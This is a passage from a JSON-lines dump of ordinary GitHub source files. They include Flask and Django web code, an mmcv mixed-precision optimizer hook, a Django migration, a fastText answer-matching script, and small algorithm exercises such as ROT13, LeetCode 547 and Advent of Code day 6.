methods=['GET'])\n@has_authority(\"sys:params:all\")\ndef page():\n return Result.ok(SysParamsService().page())\n\n\n@sys_params_controller.route(\"/\", methods=['GET'])\n@has_authority(\"sys:params:all\")\ndef info(id):\n return Result.ok(SysParamsService().info(id))\n\n\n@sys_params_controller.route(\"/\", methods=['POST'])\n@has_authority(\"sys:params:all\")\ndef save():\n data = request.json\n return Result.ok(SysParamsService().save(data))\n\n\n@sys_params_controller.route(\"/\", methods=['PUT'])\n@has_authority(\"sys:params:all\")\ndef update():\n data = request.json\n return Result.ok(SysParamsService().update(data))\n\n\n@sys_params_controller.route(\"/\", methods=['DELETE'])\n@has_authority(\"sys:params:all\")\ndef delete():\n data = request.json\n return Result.ok(SysParamsService().delete(data))\n","repo_name":"difffffft/flask-starter","sub_path":"controller/sys_params_controller.py","file_name":"sys_params_controller.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"1758966891","text":"import copy\n\nfrom torch.nn.utils import clip_grad\n\nfrom ..fp16_utils import allreduce_grads, wrap_fp16_model\nfrom .hook import HOOKS, Hook\n\n\n@HOOKS.register_module()\nclass OptimizerHook(Hook):\n\n def __init__(self, grad_clip=None):\n self.grad_clip = grad_clip\n\n def clip_grads(self, params):\n params = list(\n filter(lambda p: p.requires_grad and p.grad is not None, params))\n if len(params) > 0:\n return clip_grad.clip_grad_norm_(params, **self.grad_clip)\n\n def after_train_iter(self, runner):\n runner.optimizer.zero_grad()\n runner.outputs['loss'].backward()\n if self.grad_clip is not None:\n grad_norm = 
self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n\n\n@HOOKS.register_module()\nclass Fp16OptimizerHook(OptimizerHook):\n \"\"\"FP16 optimizer hook.\n\n The steps of fp16 optimizer is as follows.\n 1. Scale the loss value.\n 2. BP in the fp16 model.\n 2. Copy gradients from fp16 model to fp32 weights.\n 3. Update fp32 weights.\n 4. Copy updated parameters from fp32 weights to fp16 model.\n\n Refer to https://arxiv.org/abs/1710.03740 for more details.\n\n Args:\n loss_scale (float): Scale factor multiplied with loss.\n \"\"\"\n\n def __init__(self,\n grad_clip=None,\n coalesce=True,\n bucket_size_mb=-1,\n loss_scale=512.,\n distributed=True):\n self.grad_clip = grad_clip\n self.coalesce = coalesce\n self.bucket_size_mb = bucket_size_mb\n self.loss_scale = loss_scale\n self.distributed = distributed\n\n def before_run(self, runner):\n \"\"\"Preparing steps before Mixed Precision Training.\n\n 1. Make a master copy of fp32 weights for optimization.\n 2. Convert the main model from fp32 to fp16.\n \"\"\"\n # keep a copy of fp32 weights\n runner.optimizer.param_groups = copy.deepcopy(\n runner.optimizer.param_groups)\n # convert model to fp16\n wrap_fp16_model(runner.model)\n\n def copy_grads_to_fp32(self, fp16_net, fp32_weights):\n \"\"\"Copy gradients from fp16 model to fp32 weight copy.\"\"\"\n for fp32_param, fp16_param in zip(fp32_weights, fp16_net.parameters()):\n if fp16_param.grad is not None:\n if fp32_param.grad is None:\n fp32_param.grad = fp32_param.data.new(fp32_param.size())\n fp32_param.grad.copy_(fp16_param.grad)\n\n def copy_params_to_fp16(self, fp16_net, fp32_weights):\n \"\"\"Copy updated params from fp32 weight copy to fp16 model.\"\"\"\n for fp16_param, fp32_param in zip(fp16_net.parameters(), fp32_weights):\n fp16_param.data.copy_(fp32_param.data)\n\n def after_train_iter(self, runner):\n \"\"\"Backward optimization steps for Mixed Precision Training.\n\n 1. Scale the loss by a scale factor.\n 2. Backward the loss to obtain the gradients (fp16).\n 3. Copy gradients from the model to the fp32 weight copy.\n 4. Scale the gradients back and update the fp32 weight copy.\n 5. 
Copy back the params from fp32 weight copy to the fp16 model.\n \"\"\"\n # clear grads of last iteration\n runner.model.zero_grad()\n runner.optimizer.zero_grad()\n # scale the loss value\n scaled_loss = runner.outputs['loss'] * self.loss_scale\n scaled_loss.backward()\n # copy fp16 grads in the model to fp32 params in the optimizer\n fp32_weights = []\n for param_group in runner.optimizer.param_groups:\n fp32_weights += param_group['params']\n self.copy_grads_to_fp32(runner.model, fp32_weights)\n # allreduce grads\n if self.distributed:\n allreduce_grads(fp32_weights, self.coalesce, self.bucket_size_mb)\n # scale the gradients back\n for param in fp32_weights:\n if param.grad is not None:\n param.grad.div_(self.loss_scale)\n if self.grad_clip is not None:\n self.clip_grads(fp32_weights)\n # update fp32 params\n runner.optimizer.step()\n # copy fp32 params to the fp16 model\n self.copy_params_to_fp16(runner.model, fp32_weights)\n","repo_name":"Tessellate-Imaging/Monk_Object_Detection","sub_path":"18_mmaction/lib/mmcv/mmcv/runner/hooks/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"} +{"seq_id":"23844684550","text":"from django.urls import path, re_path\nfrom blog import views\n\n\napp_name = 'blog'\nurlpatterns = [\n\n #Example: /blog/\n path('',views.PostLV.as_view(), name= 'index'),\n\n #/blog/tag/\n path('tag/', views.TagCloudTV.as_view(), name='tag_cloud'),\n path('tagforeign/', views.ForeignTagCloudTV.as_view(), name='tag_cloud_foreign'),\n\n #/blog/tag/tagname/\n path('tag//', views.TaggedObjectLV.as_view(), name='tagged_object_list'),\n path('tagforeign//', views.ForeignTaggedObjectLV.as_view(), name='tagged_object_list_foreign'),\n #Example: /blog/post/ (same as /blog/)\n path('post/', views.PostLV.as_view(), name='post_list'),\n\n #/blog/post/django-example/\n path('post/', views.PostDV.as_view(), name='post_detail'),\n\n path('search/', views.SearchFormView.as_view(), name='search'),\n\n path('add/',views.PostCreateView.as_view(), name=\"add\",),\n path('change/', views.PostChangeLV.as_view(), name=\"change\",),\n \n path('update//', views.PostUpdateView.as_view(), name=\"update\",),\n path('/delete/', views.PostDeleteView.as_view(), name=\"delete\",),\n path('comment//delete/', views.CommentDeleteView.as_view(), name=\"comment_delete\",),\n re_path(r'^owner/(?P[-\\w]+)/(?P[-\\w\\s]+)$', views.PostUserLV.as_view(), name=\"post_user\",),\n \n #인기글\n path('popular/', views.PostPopularLV.as_view(), name='popular_index'),\n path('popular/', views.PostPopularDV.as_view(), name='post_popular_detail'),\n path('blogpostpopular-like/', views.PostPopularLike, name=\"blogpost_popular_like\"),\n #좋아요 눌렀을 때 가는 곳\n path('blogpost-like/', views.PostLike, name=\"blogpost_like\"),\n] ","repo_name":"alstjr0307/Web_StockStorage","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5216437244","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2021/4/8 上午10:35\n\"\"\"\n\"\"\"547. 
省份数量\n有 n 个城市,其中一些彼此相连,另一些没有相连。如果城市 a 与城市 b 直接相连,且城市 b 与城市 c 直接相连,那么城市 a 与城市 c 间接相连。\n\n省份 是一组直接或间接相连的城市,组内不含其他没有相连的城市。\n\n给你一个 n x n 的矩阵 isConnected ,其中 isConnected[i][j] = 1 表示第 i 个城市和第 j 个城市直接相连,\n而 isConnected[i][j] = 0 表示二者不直接相连。\n\n返回矩阵中 省份 的数量。\n\n示例 1:\n\n输入:isConnected = [[1,1,0],[1,1,0],[0,0,1]]\n输出:2\n示例 2:\n\n\n输入:isConnected = [[1,0,0],[0,1,0],[0,0,1]]\n输出:3\n \n\n提示:\n\n1 <= n <= 200\nn == isConnected.length\nn == isConnected[i].length\nisConnected[i][j] 为 1 或 0\nisConnected[i][i] == 1\nisConnected[i][j] == isConnected[j][i]\"\"\"\n\n\nclass Solution:\n def findCircleNum(self, isConnected) -> int:\n def dfs(cur_, target):\n print(cur_, target)\n for i, n in enumerate(isConnected[target]):\n if isConnected[target][i] and i not in cur_:\n cur_.add(i)\n dfs(cur_, i)\n\n num = len(isConnected)\n visited = set()\n res = 0\n for i in range(num):\n if i not in visited:\n print(i, visited)\n cur = {i}\n dfs(cur, i)\n visited.update(cur)\n res += 1\n return res\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.findCircleNum([[1, 1, 0], [1, 1, 0], [0, 0, 1]]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/481-600/541-560/547.py","file_name":"547.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33711556232","text":"\"\"\"\nROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher.\n\nCreate a function that takes a string and returns the string ciphered with Rot13. If there are numbers or special characters included in the string,\nthey should be returned as they are. Only letters from the latin/english alphabet should be shifted, like in the original Rot13 \"implementation\".\n\nPlease note that using encode is considered cheating.\n\"\"\"\n\n\n\n# MY VERSION\ndef rot13(message):\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n newWord = []\n\n for i in message:\n if i.lower() not in alphabet:\n newWord.append(i)\n elif message[message.index(i)].isupper():\n newWord.append(alphabet[(alphabet.find(i.lower()) + 13) % len(alphabet)].upper())\n else:\n newWord.append(alphabet[(alphabet.find(i) + 13) % len(alphabet)])\n\n return ''.join(newWord[newWord.index(c)] for c in newWord)\n \n \n# SOMEONE'S CODE (BEST WAY)\n\"\"\"\nimport string\nfrom codecs import encode as _dont_use_this_\nfrom string import maketrans, lowercase, uppercase\n\ndef rot13(message):\n lower = maketrans(lowercase, lowercase[13:] + lowercase[:13])\n upper = maketrans(uppercase, uppercase[13:] + uppercase[:13])\n return message.translate(lower).translate(upper)\n\"\"\"\n","repo_name":"eddshine/Code-Wars","sub_path":"rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3254698349","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport supervise.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fishuser', '0001_initial'),\n ('general', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Edit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', 
models.OneToOneField(related_name='supervise_user_profile', verbose_name='\\u5e33\\u865f', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Error',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('context', models.CharField(max_length=1024, verbose_name='\\u7f3a\\u5931\\u5167\\u5bb9')),\n ('improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('date', models.DateField(null=True, verbose_name='\\u532f\\u5165\\u65e5\\u671f')),\n ('memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ],\n options={\n 'verbose_name': '\\u7f3a\\u5931\\u9805\\u76ee',\n 'verbose_name_plural': '\\u7f3a\\u5931\\u9805\\u76ee',\n },\n ),\n migrations.CreateModel(\n name='ErrorContent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('no', models.CharField(max_length=64, verbose_name='\\u7f3a\\u5931\\u7de8\\u865f')),\n ('introduction', models.TextField(verbose_name='\\u7f3a\\u5931\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='ErrorImprovePhoto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('before', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('before_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u524d\\u8aaa\\u660e')),\n ('middle', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('middle_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u4e2d\\u8aaa\\u660e')),\n ('after', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('after_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5f8c\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='ErrorLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=4, verbose_name='\\u7f3a\\u5931\\u7a0b\\u5ea6')),\n ],\n options={\n 'verbose_name': '\\u7f3a\\u5931\\u7a0b\\u5ea6',\n 'verbose_name_plural': '\\u7f3a\\u5931\\u7a0b\\u5ea6',\n },\n ),\n migrations.CreateModel(\n name='ErrorPhotoFile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('upload_date', models.DateField(verbose_name='\\u4e0a\\u50b3\\u65e5\\u671f')),\n ('ext', models.CharField(max_length=10, null=True, verbose_name='\\u526f\\u6a94\\u540d')),\n ('name', models.CharField(default=b'', max_length=256, null=True, verbose_name='\\u6a94\\u6848\\u540d')),\n ('file', models.ImageField(null=True, upload_to=supervise.models._FILE_UPLOAD_TO)),\n ('memo', models.CharField(max_length=2048, null=True, verbose_name='\\u5099\\u8a3b\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='Guide',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=24, verbose_name='\\u59d3\\u540d')),\n ],\n options={\n 'verbose_name': '\\u7763\\u5c0e\\u4eba\\u54e1',\n 'verbose_name_plural': '\\u7763\\u5c0e\\u4eba\\u54e1',\n },\n ),\n migrations.CreateModel(\n name='Option',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('swarm', models.CharField(max_length=128, verbose_name='\\u7fa4')),\n ('value', 
models.CharField(max_length=128, verbose_name='\\u9078\\u9805')),\n ],\n options={\n 'verbose_name': '\\u9078\\u9805',\n 'verbose_name_plural': '\\u9078\\u9805',\n },\n ),\n migrations.CreateModel(\n name='PCC_Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('uid', models.CharField(unique=True, max_length=255, verbose_name='\\u6a19\\u6848\\u7de8\\u865f')),\n ('implementation_department', models.CharField(max_length=255, null=True, verbose_name='\\u57f7\\u884c\\u6a5f\\u95dc')),\n ('name', models.CharField(max_length=255, null=True, verbose_name='\\u6a19\\u6848\\u540d\\u7a31')),\n ('s_public_date', models.DateField(null=True, verbose_name='\\u9810\\u5b9a\\u516c\\u544a\\u65e5\\u671f')),\n ('r_decide_tenders_date', models.DateField(null=True, verbose_name='\\u5be6\\u969b\\u6c7a\\u6a19\\u65e5\\u671f')),\n ('contract_budget', models.FloatField(null=True, verbose_name='\\u767c\\u5305\\u9810\\u7b97')),\n ('decide_tenders_price', models.FloatField(null=True, verbose_name='\\u6c7a\\u6a19\\u91d1\\u984d')),\n ('year', models.IntegerField(null=True, verbose_name='\\u5e74\\u5ea6')),\n ('month', models.IntegerField(null=True, verbose_name='\\u6708\\u4efd')),\n ('percentage_of_predict_progress', models.FloatField(null=True, verbose_name='\\u9810\\u5b9a\\u9032\\u5ea6')),\n ('percentage_of_real_progress', models.FloatField(null=True, verbose_name='\\u5be6\\u969b\\u9032\\u5ea6')),\n ('percentage_of_dulta', models.FloatField(null=True, verbose_name='\\u5dee\\u7570')),\n ],\n ),\n migrations.CreateModel(\n name='SuperviseCase',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('uid', models.CharField(max_length=255, null=True, verbose_name='\\u6a19\\u6848\\u7de8\\u865f')),\n ('date', models.DateField(verbose_name='\\u7763\\u5c0e\\u65e5\\u671f')),\n ('plan', models.CharField(max_length=512, verbose_name='\\u5217\\u7ba1\\u8a08\\u756b\\u540d\\u7a31')),\n ('project', models.CharField(max_length=512, verbose_name='\\u6a19\\u6848\\u540d\\u7a31')),\n ('project_organizer_agencies', models.CharField(max_length=512, verbose_name='\\u6a19\\u6848\\u4e3b\\u8fa6\\u6a5f\\u95dc')),\n ('project_manage_unit', models.CharField(max_length=128, verbose_name='\\u5c08\\u6848\\u7ba1\\u7406\\u55ae\\u4f4d')),\n ('designer', models.CharField(max_length=128, verbose_name='\\u8a2d\\u8a08\\u55ae\\u4f4d')),\n ('inspector', models.CharField(max_length=128, verbose_name='\\u76e3\\u9020\\u55ae\\u4f4d')),\n ('construct', models.CharField(max_length=512, verbose_name='\\u627f\\u5305\\u5546')),\n ('budget_price', models.DecimalField(null=True, verbose_name='\\u9810\\u7b97\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('contract_price', models.DecimalField(null=True, verbose_name='\\u5951\\u7d04\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('contract_price_change', models.DecimalField(null=True, verbose_name='\\u5951\\u7d04\\u91d1\\u984d(\\u5343\\u5143)\\u8b8a\\u66f4\\u5f8c', max_digits=16, decimal_places=3)),\n ('info', models.TextField(verbose_name='\\u5de5\\u7a0b\\u6982\\u8981')),\n ('progress_date', models.DateField(null=True, verbose_name='\\u9032\\u5ea6\\u7d00\\u9304\\u65e5\\u671f')),\n ('scheduled_progress', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u9810\\u8a08\\u7d2f\\u8a08\\u9032\\u5ea6', max_digits=16, decimal_places=4)),\n ('actual_progress', models.DecimalField(null=True, 
verbose_name='\\u5de5\\u7a0b\\u5be6\\u969b\\u7d2f\\u8a08\\u9032\\u5ea6', max_digits=16, decimal_places=4)),\n ('scheduled_money', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u9810\\u5b9a\\u7d2f\\u8a08\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('actual_money', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u5be6\\u969b\\u7d2f\\u8a08\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('progress_info', models.TextField(null=True, verbose_name='\\u76ee\\u524d\\u65bd\\u5de5\\u6982\\u6cc1')),\n ('start_date', models.DateField(null=True, verbose_name='\\u958b\\u5de5\\u65e5\\u671f')),\n ('expected_completion_date', models.DateField(null=True, verbose_name='\\u9810\\u8a08\\u5b8c\\u5de5\\u65e5\\u671f')),\n ('expected_completion_date_change', models.DateField(null=True, verbose_name='\\u9810\\u8a08\\u5b8c\\u5de5\\u65e5\\u671f\\u8b8a\\u66f4\\u5f8c')),\n ('score', models.DecimalField(verbose_name='\\u7763\\u5c0e\\u5206\\u6578', max_digits=5, decimal_places=2)),\n ('merit', models.TextField(verbose_name='\\u512a\\u9ede')),\n ('advise', models.TextField(verbose_name='\\u5efa\\u8b70\\u4e8b\\u9805(\\u898f\\u5283\\u8a2d\\u8a08\\u554f\\u984c)')),\n ('advise_improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('advise_date', models.DateField(null=True, verbose_name='\\u6539\\u5584\\u65e5\\u671f')),\n ('advise_memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ('other_advise', models.TextField(verbose_name='\\u5efa\\u8b70\\u4e8b\\u9805(\\u5176\\u4ed6\\u5efa\\u8b70)')),\n ('other_improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('other_date', models.DateField(null=True, verbose_name='\\u6539\\u5584\\u65e5\\u671f')),\n ('other_memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ('cdate', models.DateField(verbose_name='\\u532f\\u5165\\u65e5\\u671f')),\n ('inspector_deduction', models.IntegerField(default=0, verbose_name='\\u76e3\\u9020\\u6263\\u9ede')),\n ('construct_deduction', models.IntegerField(default=0, verbose_name='\\u71df\\u9020\\u6263\\u9ede')),\n ('organizer_deduction', models.IntegerField(default=0, verbose_name='\\u4e3b\\u8fa6\\u6263\\u9ede')),\n ('project_manage_deduction', models.IntegerField(default=0, verbose_name='\\u5c08\\u6848\\u7ba1\\u7406\\u6263\\u9ede')),\n ('test', models.TextField(verbose_name='\\u6aa2\\u9a57\\u62c6\\u9a57')),\n ('captain', models.ManyToManyField(related_name='captain_set', verbose_name=b'\\xe9\\xa0\\x98\\xe9\\x9a\\x8a', to='supervise.Guide')),\n ('fes_project', models.ForeignKey(verbose_name='\\u5c0d\\u61c9FES\\u7cfb\\u7d71\\u5de5\\u7a0b\\u6848', to='fishuser.Project', null=True)),\n ('inguide', models.ManyToManyField(related_name='inguide_set', verbose_name=b'\\xe5\\x85\\xa7\\xe8\\x81\\x98\\xe5\\xa7\\x94\\xe5\\x93\\xa1', to='supervise.Guide')),\n ('location', models.ForeignKey(related_name='location_set', verbose_name='\\u5730\\u9ede', to='general.Place', null=True)),\n ('outguide', models.ManyToManyField(related_name='outguide_set', verbose_name=b'\\xe5\\xa4\\x96\\xe8\\x81\\x98\\xe5\\xa7\\x94\\xe5\\x93\\xa1', to='supervise.Guide')),\n ('place', models.ForeignKey(related_name='place_set', verbose_name='\\u7e23\\u5e02', to='general.Place')),\n ('subordinate_agencies_unit', models.ForeignKey(verbose_name='\\u6a19\\u6848\\u6240\\u5c6c\\u5de5\\u7a0b\\u4e3b\\u7ba1\\u6a5f\\u95dc', to='general.Unit', null=True)),\n ('worker', 
models.ManyToManyField(related_name='worker_set', verbose_name=b'\\xe5\\xb7\\xa5\\xe4\\xbd\\x9c\\xe4\\xba\\xba\\xe5\\x93\\xa1', to='supervise.Guide')),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='option',\n unique_together=set([('swarm', 'value')]),\n ),\n migrations.AddField(\n model_name='errorphotofile',\n name='supervisecase',\n field=models.ForeignKey(verbose_name='\\u7763\\u5c0e\\u6848', to='supervise.SuperviseCase'),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='case',\n field=models.ForeignKey(to='supervise.SuperviseCase', null=True),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='error',\n field=models.ForeignKey(to='supervise.Error', null=True),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='improve_type',\n field=models.ForeignKey(verbose_name='\\u6539\\u5584\\u5c0d\\u5411swarm=\"error_improve_type\"', to='supervise.Option', null=True),\n ),\n migrations.AddField(\n model_name='error',\n name='case',\n field=models.ForeignKey(to='supervise.SuperviseCase'),\n ),\n migrations.AddField(\n model_name='error',\n name='ec',\n field=models.ForeignKey(to='supervise.ErrorContent'),\n ),\n migrations.AddField(\n model_name='error',\n name='level',\n field=models.ForeignKey(to='supervise.ErrorLevel'),\n ),\n ]\n","repo_name":"farhanhs/fes","sub_path":"apps/supervise/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":14211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42618186672","text":"from tqdm import tqdm\nimport ujson as json\nimport subprocess\nfrom scipy.spatial import distance\nimport os\nimport csv\n\n_num = 1500\n\nopt1 = []\nopt2 = []\nopt3 = []\nopt4 = []\nindexing = []\n\nhome = os.path.expanduser(\"~\")\nfile = os.path.join(\"kgb\", \"0622.json\")\n\nwith open(file, \"r\") as fh:\n source = json.load(fh)\n for _id in range(len(source)):\n options = source[_id]['options']\n opt1.append(options[0].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt2.append(options[1].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt3.append(options[2].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt4.append(options[3].replace(\"''\", '\" ').replace(\"``\", '\" '))\n indexing.append(source[_id][\"id\"])\n\nwith open('kgb/opt1.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt1[i].replace('\\n','')])\nwith open('kgb/opt2.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt2[i].replace('\\n','')])\nwith open('kgb/opt3.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt3[i].replace('\\n','')])\nwith open('kgb/opt4.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt4[i].replace('\\n','')])\n\nos.system('cat kgb/kgb_answer.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/ans_emb.txt')\nos.system('cat kgb/opt1.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt1_emb.txt')\nos.system('cat kgb/opt2.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt2_emb.txt')\nos.system('cat kgb/opt3.csv | ./../../fastText-0.1.0/fasttext 
print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt3_emb.txt')\nos.system('cat kgb/opt4.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt4_emb.txt')\n\nf = open('kgb/ans_emb.txt','r')\nans = f.readlines()\nf = open('kgb/opt1_emb.txt','r')\nopt1 = f.readlines()\nf = open('kgb/opt2_emb.txt','r')\nopt2 = f.readlines()\nf = open('kgb/opt3_emb.txt','r')\nopt3 = f.readlines()\nf = open('kgb/opt4_emb.txt','r')\nopt4 = f.readlines()\n\n\nf = open('kgb/final_ans.csv', 'w')\ns = csv.writer(f,delimiter=',',lineterminator='\\n')\ns.writerow(['ID','Answer'])\nfor i in range(_num):\n\ta = ans[i].split(' ')[-301:-1]\n\tq = opt1[i].split(' ')[-301:-1]\n\tw = opt2[i].split(' ')[-301:-1]\n\te = opt3[i].split(' ')[-301:-1]\n\tr = opt4[i].split(' ')[-301:-1]\n\ta = list(map(float, a))\n\tq = list(map(float, q))\n\tw = list(map(float, w))\n\te = list(map(float, e))\n\tr = list(map(float, r))\n\tqq = distance.cosine(a, q)\n\tww = distance.cosine(a, w)\n\tee = distance.cosine(a, e)\n\trr = distance.cosine(a, r)\n\tvalues = [qq,ww,ee,rr]\n\tchoice = values.index(min(values)) + 1\n\ts.writerow([indexing[i], choice])\nf.close()","repo_name":"r06944010/delta-qanet","sub_path":"get_opt.py","file_name":"get_opt.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4181806846","text":"#!/usr/bin/env python3\n\"\"\"\nDay 6 of Advent of Code 2017\nhttp://adventofcode.com/2017/day/6\n\"\"\"\nimport operator\nfrom typing import Dict, List, Set\n\n\ndef count_cycles(sequence: List[int]) -> int:\n \"\"\"Count the number of redistribution cycles.\n\n Count the number of redistribution cycles before we encounter\n input that we've previously seen.\n \"\"\"\n cycles = 0\n all_unique_memory = True\n seen: Set[str] = set()\n\n while all_unique_memory:\n # find the maximum value, and the index.\n max_idx, max_value = max(enumerate(sequence), key=operator.itemgetter(1))\n\n # zero the max_value\n sequence[max_idx] = 0\n\n # iterate through this value and add one to each other value\n redist_start_idx = (max_idx+1) % len(sequence)\n\n for _ in range(max_value):\n sequence[redist_start_idx] += 1\n\n redist_start_idx = (redist_start_idx+1) % len(sequence)\n\n cycles += 1\n\n str_sequence = ''.join((str(s) for s in sequence))\n\n if str_sequence not in seen:\n seen.add(str_sequence)\n else:\n break\n\n return cycles\n\n\ndef count_cycle_length(sequence: List[int]) -> int:\n \"\"\"Count the length of the loop in the cycle.\"\"\"\n cycle = cycle_length = 0\n all_unique_memory = True\n seen: Dict[str, int] = {}\n\n while all_unique_memory:\n # find the maximum value, and the index.\n max_idx, max_value = max(enumerate(sequence), key=operator.itemgetter(1))\n\n # zero the max_value\n sequence[max_idx] = 0\n\n # iterate through this value and add one to each other value\n redist_start_idx = (max_idx+1) % len(sequence)\n\n for _ in range(max_value):\n sequence[redist_start_idx] += 1\n\n redist_start_idx = (redist_start_idx+1) % len(sequence)\n\n str_sequence = ''.join((str(s) for s in sequence))\n\n if str_sequence not in seen:\n seen[str_sequence] = cycle\n else:\n cycle_length = cycle - seen[str_sequence]\n break\n\n cycle += 1\n\n return cycle_length\n\n\nif __name__ == '__main__':\n with open('data/day06.txt', 'rt') as f:\n data = [int(x) for x in f.read().split('\\t')]\n\n assert count_cycles([0, 2, 7, 0]) == 
